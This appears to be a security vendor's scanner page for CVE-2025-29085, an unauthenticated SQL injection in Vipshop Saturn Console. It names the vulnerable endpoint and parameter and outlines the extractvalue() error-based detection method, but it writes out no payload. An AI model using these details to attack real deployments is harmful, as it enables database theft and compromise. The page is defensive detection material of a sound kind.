CVE-2025-29085 Scanner
CVE-2025-29085 Scanner - SQL Injection (SQLi) vulnerability in Vipshop Saturn Console
Short Info
Level
Critical
Single Scan
Single Scan
Can be used by
Asset Owner
Estimated Time
10 seconds
Time Interval
10 days
Scan only one
Domain, Subdomain, IPv4
Toolbox
-
Vipshop Saturn Console is a distributed job scheduling platform developed and used internally by Vipshop and offered as open-source for broader use. It is commonly deployed in enterprise environments to manage job executions across clustered environments. Administrators use the console interface to monitor job statuses, control executions, and retrieve execution metrics. The platform is integral to workflow automation and batch processing in large-scale systems. As with many admin consoles, Saturn Console exposes web-based interfaces that accept numerous user-supplied parameters. If these are not properly validated, they can become targets for injection attacks.
This scanner targets a critical SQL Injection vulnerability in Vipshop Saturn Console versions up to and including 3.5.1. The vulnerability is present in the `zkClusterKey` parameter of the `/console/dashboard/executorCount` endpoint. Due to insufficient sanitization and parameterized query usage, this parameter can be manipulated to execute arbitrary SQL commands. This vulnerability is unauthenticated, meaning attackers do not need to log in to exploit it. The severity of the flaw is elevated due to the potential for full database compromise, data exfiltration, or arbitrary code execution via database functions.
The scanner exploits this vulnerability by sending a crafted request that injects a SQL payload using the `extractvalue()` function. The function forces an error that reveals database version information in the response body. Detection is based on identifying a known error string (`XPATH syntax error`) in the HTTP response, along with the captured version string. This confirms both the presence of the flaw and successful execution of the injected SQL. The use of `extractvalue()` allows the response to leak database metadata, making this a powerful blind SQL injection technique.
Successful exploitation of this vulnerability could allow attackers to gain full access to the underlying database. This includes reading sensitive information such as credentials, application configurations, or proprietary data. In environments with weak isolation, this access may lead to lateral movement and compromise of other services. The flaw can also be used to pivot into remote code execution in some cases, depending on the database's capabilities. Because the vulnerability is accessible without authentication, it poses an immediate and severe risk to exposed Saturn Console deployments.
REFERENCES